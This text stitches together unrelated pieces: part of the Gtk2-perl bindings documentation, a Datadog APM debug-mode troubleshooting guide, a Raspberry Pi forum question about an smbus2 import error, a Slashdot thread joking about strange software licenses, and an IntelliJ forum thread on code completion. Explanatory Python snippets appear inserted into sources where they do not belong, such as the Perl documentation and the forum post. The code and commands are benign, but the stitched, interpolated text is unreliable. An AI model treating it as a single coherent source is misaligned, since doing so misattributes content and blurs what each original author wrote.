warn "control was down\n" if grep /control-mask/, @{ $event->state };
```

The gtk stock item stuff is a little different -- the GTK_STOCK_* constants are actually macros which evaluate to strings, so they aren't handled by the mechanism described above; you just specify the string, e.g., GTK_STOCK_OK => 'gtk-ok'. The full list of stock items can be found in the Gtk+ API reference.

The functions for ref'ing and unref'ing objects and free'ing boxed structures are not even mapped to perl, because it's all handled automagically by the bindings. I could write a treatise on how we're handling reference counts and object lifetimes, but all you need to know as a perl developer is that it's handled for you, and the object will be alive so long as you have a perl scalar pointing to it or the object is referenced in another way, e.g. from a container. The only thing you have to be careful about is the lifespan of non-reference-counted structures, which means most things derived from Glib::Boxed.
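The constant and flag nicknames described above follow a mechanical convention (strip the common prefix, lower-case, optionally '_' to '-') that can be sketched in a few lines of Python — an illustration only, since the real mapping is done by the GType machinery:

```python
def nickname(constant, prefix):
    """Convert a C enum name to its bindings nickname.

    e.g. nickname("GTK_BUTTONS_OK_CANCEL", "GTK_BUTTONS") -> "ok-cancel"
    """
    stripped = constant[len(prefix):].lstrip("_")
    return stripped.lower().replace("_", "-")

print(nickname("GTK_WINDOW_TOPLEVEL", "GTK_WINDOW"))     # toplevel
print(nickname("GTK_BUTTONS_OK_CANCEL", "GTK_BUTTONS"))  # ok-cancel
```

The '_' to '-' step is the optional part: the bindings accept either spelling, as the 'ok-cancel' / 'ok_cancel' example shows.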
If it comes from a signal callback it might be good only until you return, or if it's the insides of another object then it might be good only while that object lives. If in doubt you can copy. Structs from copy or new are yours and live as long as they are referred to from Perl.

Use normal perl callback/closure tricks with callbacks. The most common use you'll have for callbacks is with the Glib signal_connect method:

```perl
$widget->signal_connect (event => \&event_handler, $user_data);
$button->signal_connect (clicked => sub { warn "hi!\n" });
```

$user_data is optional, and with perl closures you don't often need it (see "Persistent variables with closures" in perlsub). The userdata is held in a scalar, initialized from what you give in signal_connect etc. It's passed to the callback in the usual Perl "call by reference" style, which means the callback can modify its last argument, i.e. $_[-1], to modify the held userdata. This is a little subtle, but you can use it for some "state" associated with the connection.

```perl
$widget->signal_connect (activate => \&my_func, 1);
sub my_func {
    print "activation count: $_[-1]\n";
    $_[-1] ++;
}
```

Because the held userdata is a new scalar there's no change to the variable (etc) you originally passed to signal_connect. If you have a parent object in the userdata (or closure) you have to be careful about circular references preventing parent and child being destroyed. See "Two-Phased Garbage Collection" in perlobj about this generally. In Gtk2-Perl toplevel widgets like Gtk2::Window always need an explicit $widget->destroy, so their destroy signal is a good place to break circular references. But for other widgets it's usually friendliest to avoid circularities in the first place, either by using weak references in the userdata, or possibly locating a parent dynamically with $widget->get_ancestor.
A major change from gtk-perl (the bindings for Gtk+-1.x) is that callbacks take their arguments in the order prescribed by the C documentation, and only one value is available for user data. gtk-perl allowed you to pass multiple values for user_data, and always brought in the user_data immediately after the instance reference; this proved to be rather confusing, and did not follow the C API reference, so we decided not to do that for gtk2-perl.

In C you can only return one value from a function, and it is a common practice to modify pointers passed in to simulate returning multiple values. In perl, you can return lists; any functions which modify arguments have been changed to return them instead. A common idiom in gtk is returning gboolean, and modifying several arguments if the function returns TRUE; for such functions, the perl wrapper just returns an empty list on failure.

in C:

```c
foo_get_baz_and_quux (foo, &baz, &quux);
```

in perl:

```perl
($baz, $quux) = $foo->get_baz_and_quux;
```

Most things that take or return a GList, GSList, or array of values will use native perl arrays (or the argument stack) instead. You don't need to specify string lengths, although string length parameters should still be available for functions dealing with binary strings. You can always use substr to pass different parts of a string.

Anything that uses GError in C will croak on failure, setting $@ to a magical exception object, which is overloaded to print as the returned error message. The ideology here is that GError is to be used for runtime exceptions, and croak is how you do that in perl.
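The out-parameters-become-list-returns convention can be mimicked in any language with multiple return values; here is a Python analogue of the `($baz, $quux) = $foo->get_baz_and_quux` idiom above (the names are the same placeholder names, not a real API):

```python
def get_baz_and_quux(foo):
    # In C this would take &baz and &quux out-parameters and return a
    # gboolean; here we return a tuple on success and an empty tuple on
    # failure, mirroring "returns an empty list on failure".
    if not foo:
        return ()
    return (foo["baz"], foo["quux"])

baz, quux = get_baz_and_quux({"baz": 1, "quux": 2})
print(baz, quux)  # 1 2
```

The empty-tuple-on-failure shape also keeps the success test cheap: an empty return is falsy, just as an empty list is in perl boolean context.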
You can catch a croak very easily by wrapping the function in an eval:

```perl
eval {
    my $pixbuf = Gtk2::Gdk::Pixbuf->new_from_file ($filename);
    $image->set_from_pixbuf ($pixbuf);
};
if ($@) {
    print "$@\n"; # prints the possibly-localized error message
    if (Glib::Error::matches ($@, 'Gtk2::Gdk::Pixbuf::Error',
                              'unknown-format')) {
        change_format_and_try_again ();
    } elsif (Glib::Error::matches ($@, 'Glib::File::Error', 'noent')) {
        change_source_dir_and_try_again ();
    } else {
        # don't know how to handle this
        die $@;
    }
}
```

This has the added advantage of letting you bunch things together as you would with a try/throw/catch block in C++ -- you get cleaner code. By using Glib::Error exception objects, you don't have to rely on string matching on a possibly localized error message; you can match errors by explicit and predictable conditions. See Glib::Error for more information.

The bindings do automatic memory management. You should never need to use these. The gtk_* functions are deprecated in favor of the g_* ones. Gtk2::Helper has a wrapper for Glib::IO->add_watch which makes it behave more like gtk_input_add. Because of the use of Perl subroutine references in place of GClosures, there is no way to preserve at the Perl level the one-to-one mapping between GtkAccelGroups and GClosures. Without that mapping, this function is useless. Avoid a clash with $gobject->set.

As a general rule, functions that take a pair of parameters, a list and the number of elements in that list, will normally omit the number of elements and just accept a variable number of arguments that will be converted into the list and number of elements. In many instances parameters have been reordered so that this will work. See below for exceptions and specific cases that are not detailed in the generated Perl API reference.

These classes were incorrectly written with a capital B in version 1.00 and below. They have been renamed in version 1.01 and the old way to write them is deprecated, but supported.
The n_entries parameter has been omitted and callback_data is accepted as the first parameter. All parameters after that are considered to be entries. Position and items parameters flipped order so that an open-ended parameter list could be used:

```perl
$list->insert_items ($position, $item1, $item2, ...);
```

(Note that GtkList and GtkListItem are deprecated and only included because GtkCombo still makes use of them; they are subject to removal at any point, so you should not utilize them unless absolutely necessary.) versions of these functions do not do this. Where a GClosure is wanted by the C stuff, a perl subroutine reference suffices. However, because of this, there are a few subtle differences in semantics.

The canonical documentation is the upstream C API reference. Gtk2 includes a full suite of automatically-generated API reference POD for the Perl API -- see Gtk2::index for the starting point. There should be a similar document for Glib --- link to it here when it exists.

muppet <scott at asofyet dot org>

Copyright (C) 2003, 2009.
When experiencing unexpected behavior with Datadog APM, there are a few common issues you can look for before reaching out to Datadog support: Make sure the Agent has APM enabled: Run the following command on the Agent host: netstat -anp | grep 8126. If you don’t see an entry, then the Agent is not listening on port 8126, which usually means either that the Agent is not running or that APM is not enabled in your datadog.yaml file. See the APM Agent setup documentation for more information. Ensure that the Agent is functioning properly: In some cases the Agent may have issues sending traces to Datadog. Enable Agent debug mode and check the Trace Agent logs to see if there are any errors. Verify that your tracer is running correctly: After having enabled tracer debug mode, check your Agent logs to see if there is more info about your issue. If there are errors that you don’t understand, or traces are reported to be flushed to Datadog and you still cannot see them in the Datadog UI, contact Datadog support and provide the relevant log entries with a flare. Datadog debug settings are used to diagnose issues or audit trace data. Enabling debug mode in production systems is not recommended, as it increases the number of events that are sent to your loggers. Use it sparingly, for debugging purposes only. Debug mode is disabled by default. To enable it, follow the corresponding language tracer instructions: To enable debug mode for the Datadog Java Tracer, set the flag -Ddatadog.slf4j.simpleLogger.defaultLogLevel=debug when starting the JVM. Note: Datadog Java Tracer implements SL4J SimpleLogger. As such, all of its settings can be applied like logging to a dedicated log file: -Ddatadog.slf4j.simpleLogger.logFile=<NEW_LOG_FILE_PATH> To enable debug mode for the Datadog Python Tracer, set the environment variable DATADOG_TRACE_DEBUG=true when using ddtrace-run. 
To enable debug mode for the Datadog Ruby Tracer, set the debug option to true in the tracer initialization configuration:

```ruby
Datadog.configure do |c|
  c.tracer debug: true
end
```

Application Logs: By default, all logs are processed by the default Ruby logger. When using Rails, you should see the messages in your application log file. Datadog client log messages are marked with [ddtrace], so you can isolate them from other messages. Additionally, it is possible to override the default logger and replace it with a custom one. This is done using the log attribute of the tracer.

```ruby
f = File.new("<FILENAME>.log", "w+") # Log messages should go there
Datadog.configure do |c|
  c.tracer log: Logger.new(f) # Overriding the default tracer
end
Datadog::Tracer.log.info { "this is typically called by tracing code" }
```

See the API documentation for more details.

To enable debug mode for the Datadog Go Tracer, enable the debug mode during the Start config:

```go
package main

import "gopkg.in/DataDog/dd-trace-go.v1/ddtrace/tracer"

func main() {
    tracer.Start(tracer.WithDebugMode(true))
    defer tracer.Stop()
}
```

To enable debug mode for the Datadog Node.js Tracer, enable it during its init:

```javascript
const tracer = require('dd-trace').init({ debug: true })
```

Application Logs: By default, logging from this library is disabled. In order to get debugging output sent to your logs, pass a custom logger with debug() and error() methods that can handle messages and errors, respectively. For example:

```javascript
const bunyan = require('bunyan')
const logger = bunyan.createLogger({ name: 'dd-trace', level: 'trace' })

const tracer = require('dd-trace').init({
  logger: {
    debug: message => logger.trace(message),
    error: err => logger.error(err)
  },
  debug: true
})
```
Refer to the Agent troubleshooting guide for more information. If an error was reported by the Agent (or the Agent could not be reached), you will see Error from the Agent log entries. In this case, validate your network configuration to ensure the Agent can be reached. If you are confident the network is functional and that the error is coming from the Agent, refer to the Agent troubleshooting guide. If neither of these log entries is present, then no request was sent to the Agent, which means that the tracer is not instrumenting your application. In this case, contact Datadog support and provide the relevant log entries with a flare. For more tracer settings, check out the API documentation. To enable debug mode for the Datadog .NET Tracer, set the isDebugEnabled argument to true when creating a new tracer instance: using Datadog.Trace; var tracer = Tracer.Create(isDebugEnabled: true); // optional: set the new tracer as the new default/global tracer Tracer.Instance = tracer; To enable debug mode for the Datadog PHP Tracer, set the environment variable DD_TRACE_DEBUG=true. See the PHP configuration docs for details about how and when this environment variable value should be set in order to be properly handled by the tracer. In order to tell PHP where it should put error_log messages, you can either set it at the server level, or as a PHP ini parameter, which is the standard way to configure PHP behavior. If you are using an Apache server, use the ErrorLog directive. If you are using an NGINX server, use the error_log directive. If you are configuring instead at the PHP level, use PHP’s error_log ini parameter. The release binary libraries are all compiled with debug symbols added to the optimized release. It is possible to use gdb or lldb to debug the library and to read core dumps. If you are building the library from source, pass the argument -DCMAKE_BUILD_TYPE=RelWithDebInfo to cmake to compile an optimized build with debug symbols. 
```shell
cd .build
cmake -DCMAKE_BUILD_TYPE=RelWithDebInfo ..
make
make install
```
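Several of the tracers above toggle debug mode from an environment variable (DATADOG_TRACE_DEBUG, DD_TRACE_DEBUG). If you need the same kind of switch in your own tooling, the parsing is simple; this sketch (illustrative only, not part of any Datadog library) treats the usual truthy spellings as enabled:

```python
import os

TRUTHY = {"1", "true", "yes", "on"}

def debug_enabled(var="DD_TRACE_DEBUG", environ=os.environ):
    """Return True when the environment variable holds a truthy value."""
    return environ.get(var, "").strip().lower() in TRUTHY

print(debug_enabled(environ={"DD_TRACE_DEBUG": "true"}))   # True
print(debug_enabled(environ={"DD_TRACE_DEBUG": "false"}))  # False
print(debug_enabled(environ={}))                           # False
```

Accepting only an explicit allow-list of truthy values keeps "false", "0", and an unset variable all mapping to disabled, which matches how such flags are usually documented.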
I am following your directions on this link. I am using a Grove Base Hat and a Raspberry Pi. I have followed the directions exactly but I always get an error message when I import seeed_sgp30:

```
Traceback (most recent call last):
  File "test", line 1, in <module>
    import seeed_sgp30
  File "/home/pi/.local/lib/python3.7/site-packages/seeed_sgp30.py", line 1, in <module>
    from sgp30 import Sgp30
  File "/usr/local/lib/python3.7/dist-packages/sgp30/__init__.py", line 1, in <module>
    from .sgp30 import Sgp30
  File "/usr/local/lib/python3.7/dist-packages/sgp30/sgp30.py", line 2, in <module>
    from smbus2 import SMBusWrapper, SMBus, i2c_msg
```

After looking at the documentation for the smbus2 package that this code uses, it does not look like there is a SMBusWrapper in smbus2 anymore. I am unable to edit this out of the code. What should I do?
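For context on the traceback above: newer releases of smbus2 dropped SMBusWrapper (SMBus itself can be used as a context manager instead), which is why the import inside sgp30.py fails. One common workaround — sketched below, not an official fix from either library — is an import fallback; the nested try/except also covers the case where smbus2 is not installed at all:

```python
# Try the old name first (older smbus2), then fall back to SMBus,
# which newer smbus2 releases expose as a context manager.
try:
    from smbus2 import SMBusWrapper as Bus
except ImportError:
    try:
        from smbus2 import SMBus as Bus
    except ImportError:
        Bus = None  # smbus2 is not installed in this environment

print(Bus)  # a class when smbus2 is available, None otherwise
```

Applying the same idea to the installed sgp30/sgp30.py (or pinning an smbus2 release that still ships SMBusWrapper) should get past the ImportError.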
Would You Die To Respect a Software License? 233 Julie188 writes "Some 2,000 licenses cover the 230,000+ projects in Black Duck's open source knowledge base. While 10 licenses comprise 93% of the software, that leaves 1,980-odd licenses for the other 3% — and some of them have really crazy conditions. The Death and Repudiation License, for instance, requires the user to be dead." Hell No ! (Score:4, Funny) Even if I like a software to be free as in freedom, I respect a software developer to do whatever with his software Re: (Score:2) There are and needs to be more stringent restrictions on what can be put in a license agreement. Right now you could sign away your first born with my Primary Recombinant DNA Acquisition license but I'd be SOL when I came to collect. License often carry unreasonable terms for the licensee and no responsibility for the licenser. I think that licenses should be standardised (as in ISO) and ha Math license (Score:5, Funny) Which license redefines math so that 1980 + 10 = 2000, and taking 93% leaves only 3% remaining? Re: (Score:2) The Sonny Bono License. The humorless answer: (Score:5, Informative) The summary left out part of a sentence: It's important to note that the top 10 licenses cover 93% of all projects and the top 20 almost 97%. Re: (Score:2) Welcome to New Math! Where any answer is the right one! Way to go Jimmy! Re: (Score:2, Insightful) It's not news, it's Slashdot (Score:5, Insightful) Slow day. Re:It's not news, it's Slashdot (Score:5, Funny) Here's some more ideas: Would you smell a nasty fart to prevent terrorism? Would you give up your ability to see if it meant you could time travel? Would you listen to an entire Britney Spears album if it could bring about world peace? Re:It's not news, it's Slashdot (Score:5, Funny) -- Would you take a job as Steve "Monkeyboy" Ballmer's toe-cheese extractor if it meant Microsoft would publish only via OSS licenses? 
-- Would you take a position as Steve "Tyrant" Jobs' fashion consultant if it meant Apple would open up the app store?

-- Would you lick Stallman's neck and armpit if it meant GNU/Hurd became a complete, usable, modern kernel?

These are the type of choices that would keep me up at night.

Re: (Score:2)

You owe me a meal and a bottle of brain bleach for that written Goatse/PainSeries. Please mod down.

Re: (Score:2)

Re: (Score:3, Informative)

just ask rms: [youtube.com]

Re: (Score:3, Informative)

Re:It's not news, it's Slashdot (Score:5, Funny)

I suppose it would be a worthy sacrifice. I am willing to expend my life in pursuit of turtlenecks if it means Openness for all. No! Not in a thousand lifetimes, no! What do you think I am, you sick twisted fuck?!?

Re: (Score:2)

Microsoft to publish their source code under OSS licenses? So you want Steve Ballmer's toe cheese to not only be smelled by you but also to proliferate throughout the entire internet?

Re:It's not news, it's Slashdot (Score:5, Funny)

-- Would you lick Stallman's neck and armpit if it meant GNU/Hurd became a complete, usable, modern kernel?

Would get Stallman to finally shut up? If so, I'd definitely consider it.

Re: (Score:2)

you, sir, owe me a new keyboard, plus a case of hard liquor to remove the mental image of someone licking RMS's armpit from my brain

Re: (Score:2)

-- Would you take a position as Steve "Tyrant" Jobs' fashion consultant if it meant Apple would open up the app store?

That's easy. I could write a program to do that!

#include <stdio.h>

int main() {
    printf("Ah, Mr Jobs. Try the black skivvy - I am sure you will like it.\n");
    return 0;
}

Re: (Score:2)

Would you lick Stallman's neck and armpit if it meant GNU/Hurd became a complete, usable, modern kernel?

C'mon now, asking for someone to sacrifice his life for a cause, even as worthy as that, is too much!

Re:It's not news, it's Slashdot (Score:4, Funny)

Where did you get an Instant Adult (tm) cloning device? I thought they were sold out?
I personally lack the replicator necessary to fork Stallman and lick him myself. Re: (Score:2, Insightful) Re: (Score:2) Re: (Score:2) Would you listen to an entire Britney Spears album if it could bring about world peace? Britney's albums are hardly what I would call "music", and the concept of world peace is the antithesis to human nature. Regardless, it's par for the course. Re: (Score:2, Insightful) Would you listen to an entire Britney Spears album if it could bring about world peace? Depends, is "world peace" defined as "all humans exterminated" and is the Spears album the delivery method of said destruction? Re: (Score:2) Who put the Idle story in the News bin? (Score:4, Insightful) If a software license exists, and no software is written that is available under the terms of that license, does it merit discussion on Slashdot? It looks to me as somebody set up a site to create a gallery of TOSes so software writers can get some ideas... but then the site got attacked by the typical forum trolls took over and we get a comedy site as the end result. This belongs to Idle next to news from The Onion. Re: (Score:2) No software? I'm dissapointed... Seems like a decent fit for grave / graveyard info screens, embedded software used for some equipment required for transplants, controlling the morgue, etc. Re: (Score:2, Interesting) Although would it be possible for this license to have close to an applicable use? Ie. Software for dealing with funeral expenses. You can only use it if you are dead, and being dead gives leave for your family to access the software license only. If you aren't dead, then they or you are breaking the terms of the license. Just a thought, obviously the terms of excessive punishment may need to be edited. Severability (Score:3, Insightful) I believe a court would find that clause unenforceable and sever it from the rest of the contract. Re: (Score:2) I believe a court would also find that you lack any sense of humor. 
The D&R license is a joke. Re: (Score:2) No, really? Re: (Score:2) So? It's still offered as license. Since it's offered as an option with a BSD license it doesn't really matter, but if the software was actually valuable and other license more restrictive making such a joke could end up costing you when someone tries to get a court to strip bits out and just leave "you can have it all"... Re: (Score:2) Only if it was unconditional. If (as with most free software licenses) it was conditioned on actions that would ordinarily violate copyright, the court might simply ignore the clause as irrelevant (and probably whimsical*), and rule that you're guilty of copyright violation. In fact, as with the GPL, it's unlikely that the license would ever be mentioned in court, since the plaintiff has a straightforward copyright violation case, and the defendant can't claim to be dead and thus protected from prosecutio Quip on Contracts (Score:5, Insightful) The "freedom to encumber" works is like the "freedom to punch someone" ... They are both 'freedoms' that only exist at the expense of others. -- Gregory Maxwell, discussion on licensing Re:Quip on Contracts (Score:5, Insightful) That would be a good description of copyright, and thus copyright licenses, but not contracts in general. The terms of a contract are merely conditions which you require to be met before you will voluntarily give the other party some of your property, which you are in no way obligated to do. No matter what the terms may be, they impose no expense on others; one is always free to ignore the offer should one find the terms unpalatable. Licenses are similar, but the copyrights which give licenses their power are artificial social-engineering constructs which only exist at the expense of others. 
Re:Quip on Contracts (Score:5, Insightful) Fair, although contract law has recognised certain topics where contracts are not free for good reason - situations of some sorts are considered generally either coercive or one-sided enough that the public good is ill-served by the absence of some (or significant regulation). Landlord-tenant law is one example, although English common law has accumulated a long list of other circumstances and remedies to specific abuses, many of which we've kept in the US. Re: (Score:2) I recognize that modern contract law has (incorrectly and unjustly, IMHO) rendered certain kinds of contractual terms void. However, even if such terms were fully enforceable they would still be nothing like the "freedom to punch someone" referred to in the Gregory Maxwell quote. I don't know about serving "the public good"—that isn't really the purpose of contracts, at least not directly—but no mere contractual term is ever truly coercive per se. Somewhere along the line the idea came about that Re: (Score:2) Many of us support the use of force to serve the public good, and feel that the public good is in fact the whole point of government and society. I see where you're coming from though - there's a number of ways to think about the goals/purposes of these things. Re: (Score:2) Many of us support the use of force to serve the public good, and feel that the public good is in fact the whole point of government and society. I would not really disagree with either of those statements. However, in my considered opinion the initiation of force against non-aggressors never serves the public good. The purpose of government may indeed be to serve the public good, but I feel its fundamental nature as a legitimized aggressor can only serve to undermine that purpose. I am not a utilitarian; I do not believe that it is possible to weight the benefits to some against involuntary costs imposed on others. 
The obvious corellary is that the o Re: (Score:2) It's not only utilitarians who consider such weighings - various principled philosophies do as well. Any concept of duty that's not wholly negative requires it. It sounds like your perspective is somewhere in the Libertarian-Objectivist spectrum - mine is somewhere in the Academic-Socialist spectrum - I suspect we're not going to see eye-to-eye on what you'd call coercion. To me, autonomy is one thing that's important for human happiness and well-being but it's something I'd sacrifice in certain structured Re: (Score:2) For example, in a fully free market (one in which there are no constraints on contracts), all landlords want maximum rents with minimal investment. Now, in theory, some landlords would become slumlords while Re: (Score:2) I already responded to all of this in the GP comment: Somewhere along the line the idea came about that because someone really wants something, it is somehow coercive to place conditions on giving it to them (even though you aren't required to give it to them at all). I obviously reject this notion; coercion is force, and only force. "Really want" includes things you think you need for survival: food, shelter, work. No one is obligated to provide you with any of that; if they choose to offer it to you they have an absolute right to impose whatever conditions they want. Of course you are free to reject their conditions, but they are equally free to keep their property. Tempering that somewhat, note that I consider contracts to only include transfers of alienable property. In other words Re: (Score:2) Libertarian viewpoint which places liberty as the highest value is completely incompatible with the anarchistic viewpoint because liberty cannot exist in an anarchy, so those terms don't belong in the same sentence, never mind separated by a / as if they are two sides of the same coin. 
Trouble is, in many housing markets, housing is constrained, either due to resource shortages (water, usually) or geography (too many mountai Re: (Score:2) Libertarian viewpoint which places liberty as the highest value is completely incompatible with the anarchistic viewpoint because liberty cannot exist in an anarchy ... On the contrary, liberty cannot exist except in anarchy. Simply put, government is legitimized aggression; that is the only trait which distinguishes it from other private organizations, such as co-ops. Liberty is the absence of aggression. The libertarian viewpoint is that aggression (initiation of force against a non-aggressor) is never legitimate. The libertarian society can only be anarchistic; if it had a government then it would be endorsing aggression, and thus not libertarian. A fully libertarian soc Re: (Score:2) "Contracts in general" is a really bad description of software licenses. Contracts are rarely one sided and almost always negotiated between parties. More over they require express consent in the form of a signature to be valid. A software license is never negotiated, has no responsibilities for the vendor and uses implied consent (shrink wrap Eula, press F8, click I agree). Most contracts define the Re: (Score:2) Re: (Score:2) The point of quips are that they state a position succinctly and with charm, not that they rely on the authority of the person who said them. I could tell you who he is, but it doesn't really matter. BSD or die (Score:2) Your honor it is clear the defendant rejected the BSD license. They must therefore have accepted the alternate D&R licenses. In recognition of this we demand the death of the defendant as fulfillment of the terms of the license. Death and Repudiation License is peanuts (Score:5, Funny) The Death and Repudiation License is nothing compared to the EULA of iPhone OS 5.1 Re: (Score:2) Back in the 80's... 
(Score:2, Funny)

I remember many shareware authors writing strange things in their terms and licenses. I recall that a common graphics viewer for those cool new GIF files (among many other formats) wrote that if you continued using their software after 30 days without paying then you would be visited by demons who would torment you. I was just a kid, didn't have a job, and I never paid. Demons rarely ever visited, and when they did it was just to borrow a cup of sugar or use the phone.

Re:Back in the 80's... (Score:4, Informative)

I have seen ones, approved by the permit people no less, with instructions to the 'bat cave', lyrics from Pink Floyd, and all kinds of weird junk.

Re:Back in the 80's... (Score:5, Interesting)

I recall that a common graphics viewer for those cool new GIF files (among many other formats) wrote that if you continued using their software after 30 days without paying then you would be visited by demons who would torment you.

Graphics Workshop had something like this. In fact: If you want to see additional features in Graphic Workshop, register it. If we had an Arcturian mega-dollar for everyone who has said they'd most certainly register their copy if we'd add just one more thing to it, we could buy ourselves a universe and retire. Oh yes, should you fail to support this program and continue to use.

Mother Jones Software License (Score:2)

I was an adult, had a job, and never bought (mainly because I

When I was in college... (Score:5, Funny)

One of my schoolmates released some software with a custom license, which was basically the old-form original UC Berkeley BSD license with a restriction prohibiting any use by persons in "Country Code F", defined as (paraphrasing from memory): "France, Belgium, Quebec, Senegal, Ghana, Did we mention France?" I think it was bad experiences with language classes in high school, but I'm not sure.
Re: (Score:2) To be fair, that list lists Canada three times: Canada, New Brunswick, and Quebec are all member states. That lists governments that are French speaking, not just countries. There are 50 major governments in the US, for example, and thousands of minor governments. I'm far too lazy to look at anything else in the list, but I'm sure there are more "governments within governments" that are recognized separately. Re: (Score:2) D&R license (Score:3, Funny) The D&R license doesn't require anyone to die... you just have to be dead to use software under it. The license even specifies how this is to be accomplished. You're allowed to tell your heirs to use the software on your behalf after you're dead. The really puzzling clause is the revocation clause, which not only allows the licensor to revoke the license, but proclaims that the licensor WILL revoke the license, and then the heirs will be punished "to the fullest extent of the law." I believe a court would only find liability for usage AFTER the licensor revoked, regardless of the drafter's intention. Another strange clause seems to say that ghosts and angels are not considered dead for purposes of the license. Pure silliness, of course. What court would claim jurisdiction over angels and ghosts? Certainly not a human one. And an inhuman one is not likely to respect software licenses. The drafter made a big mistake here in failing to define ghosts and angels. These words are just begging for a legal definition. I am not a lawyer and this is not legal advice. +1 Pedantry (Score:2) Cake or Death? (Score:2) Re: (Score:2) To Paraphrase Jefferson Airplane (Score:2) "Would the software license [orig.: 'my country'] die for me?" Viva la undead nation! (Score:3, Funny) *Pointy Crowned Liches Me (Score:2) I saw this once on the intertubes: I am willing to die to prove that my god exists!!! Are you willing to die to prove that he doesn't! So it's all well and good. Re: (Score:2) Wow! 
That sort of quote is the quintessence of the median of American theological debate. Since the probability of the first happening is vanishingly small (at least for the moron who spouted it), and the probability of the second higher than the first (at least in this country), being rational, I'd tend to say no to the second. However, that still is not a proof of God's existence (or non-existence). A greater willingness to die stupidly does not a proof make. Of course, being a heathen (and somewhat snar Re: (Score:2) I'm willing to eat a tasty cupcake to prove your god doesn't exist. It may not be as dramatic as dying, but it is every bit as effective a proof! :) D&R license (Score:2) Thereware (Score:2) Remember not to use Java.... (Score:5, Funny) Re: (Score:2) There's my Re: (Score:2) A -lot- of commercial software have that in their licenses. So many, in fact, that I find myself wondering if there aren't laws in some first world countries that force that to be in there somewhere unless you have specific certifications. Re:Remember not to use Java.... (Score:5, Informative) Re: (Score:3, Interesting) You don't think Windows for the Navy actually runs the mission critical systems like the reactor do you? Regardless, every system on the modern navy has a manual control system, not that you can actually hit a target with manual fire control as was proved many times during WWII, but the controls are there just in case you want to fire 1000 shells and only hit the target once. Re: (Score:2) You don't think Windows for the Navy actually runs the mission critical systems like the reactor do you? I thought everything mission critical in the military had to be written in Ada? Re: (Score:3, Informative) I don't know how they reconcile that with Windows for Battleships exactly. I think that's a moot point, because nobody uses battleships anymore. [wikipedia.org] Re: (Score:3, Funny) Re:Remember not to use Java.... (Score:4, Informative) It was Windows for Warships. 
Kids these days, just don't get alliteration any more. Re: (Score:2) Windows for Battleships is specifically certified for such applications. It's just like the operating systems that run the equipment on fighter jets - they are very thoroughly tested and cleared by the military first. Unlike some oil companies I know, which buy the most expensive product then trust the vendor to tell them how awesome it is even though all their employees are screaming about how it runs slower and with fewer features than the 30 year old tech they were using before. *twitch* Re: (Score:2) Well, thank god, really I wouldn't want a java program controlling a nuclear facility! Or better, I wouldn't want the average java programmer making a java program that will control a nuclear facility. Re: (Score:2) Or better, I wouldn't want the average java programmer making a java program that will control a nuclear facility. Yeah, but that provision means even drawing up a rough preliminary schematic on a drawing program written in Java is verboten. And I believe I found that gem in the JRE EULA, so all common users have to agree to it, not just developers. But you can always get around it by switching to OpenJDK, so beware! Or iTunes. (Score:2) The reality distortion field will not be weaponized! Re: (Score:2) That's a really stupid way for them to word that provision. What if you work at a DoD lab or Northrup Grumman and you like to jam out while you work? Re: (Score:2) ...."the design, construction, operation or maintenance of any nuclear facility." That's in Sun's EULA. For real. According to James Gosling, its there for good reason; to paraphrase: "During the early days of Java there were some guys getting support from Sun for a nuclear simulator. After some long discussions, they found out they were using it for the operation of a nuclear power plant. Sun and their lawyers wanted no part of anything like that, just in case." 
No warranty fortune cookie (Score:2)

Somewhat related is one of my favorite fortune cookies: syst

I would die for (Score:2)

My family and a few select friends that I believe to be better people than myself. I would like to think I would give my life if it meant saving more than one person. As Spock said (which probably came from someone else I'm sure): The needs of the many outweigh the needs of the few or the one. There are several constraints on these things of course, and in reality if it comes right down to it, I would probably not have the courage to do so, even if I think I do now while I'm not facing the decision directl

Re: (Score:2, Insightful)

Re: (Score:2)

You mean if you don't accept the BSD license. If you accept the D&R license, you're fucked.

Re:Now that's.... (Score:5, Funny)

I strongly suspect the D&R license is a BSD license fan responding to someone wanting them to dual-license something.
Re: (Score:2) That Death and Repudiation license is awesome. I wish I actually published software so I could use it, that's one hell of a mind-fuck. The only way to use the software is if you are dead (there is an allowance to have your heirs carry out your uses for you), and if you follow the terms of the license it will be repudiated at a time deemed most likely to screw your heirs over. Re: (Score:2) Re: (Score:2) Not if you don't have death. Re: (Score:2) A corporation also can't be considered dead, which is the prime requirement of the D&R contract. You must have been alive to be considered dead. There is even a clause for "dead but interactive", specifically covering ghosts and angels, but would probably also extend to zombies and corporations as well (assuming a corp could pass the dead test). Even if they got around that part though, this part would screw them out the yin-yang:. I'm not sure how that works if the license specifically removes the licen Re: (Score:2) Keith is already dead, his brain just don't know it yet. The D&R license is likely for him, I think. Re: (Score:2) Sadly kid's these days wont get this joke.
Hi All!

We have a number of requests filed against $subj. And it seems that we need to rewrite it. Lets make a list of features you'd like to be implemented. By now I know about the following:

-- Filter out classes after implements
-- Filter out current and final classes in extends

What else?

IK
IntelliJ Labs / JetBrains Inc.
"Develop with pleasure!"

Hi All!

Those after throws and throw new (maybe it works already) ...

Tom

On Fri, 9 May 2003 01:06:25 +0400, Igor Kuralenok <ik@intellij.com> wrote:
>Hi All!
>
>We have a number of requests filed against $subj. And it seems that we need
>to rewrite it. Lets make a list of features you'd like to be implemented. By
>now I know about the following:
>
>What else?

I find the 3 different "code completion" keys (Ctrl-Space, Ctrl-Shift-Space, & Ctrl-Alt-Space) to be very confusing. I would much prefer 1 "Super Code Completion" or "Do What I Mean" key that just does the best job it can. I have submitted for this request. This is one place where IDEA forces me to think about the tool I'm using rather than the code I'm writing.

Neil

Neil Galarneau wrote:

I agree that it's a bit confusing but I don't see how it could be made different without mind reading. Code completion should be able to complete any extended expression that will eventually return a value of the expected type. In other words, if there's a method processFoo(Foo something), and you just typed processFoo(abc.|) where | is the caret, then you want to be able to complete the method getBar() which returns a Bar that in turn has a method getFoo(). Eventually you get processFoo(abc.getBar().getFoo()). There must be a way for completion to do this, so clearly getBar() should be part of the completion list. If it isn't, you'd have to type getBar() manually. But sometimes you know that abc has a method that returns a Foo directly and that that is the method you want.
So when you've typed processFoo(abc.|) and you invoke code completion, you only want the items that return a Foo directly. There must be a way for completion to do this, so clearly getBar() should NOT be part of the completion list. If it is, you'll get thousands of irrelevant completions in the list. How do you reconcile these two different usage patterns without having different keyboard shortcuts?

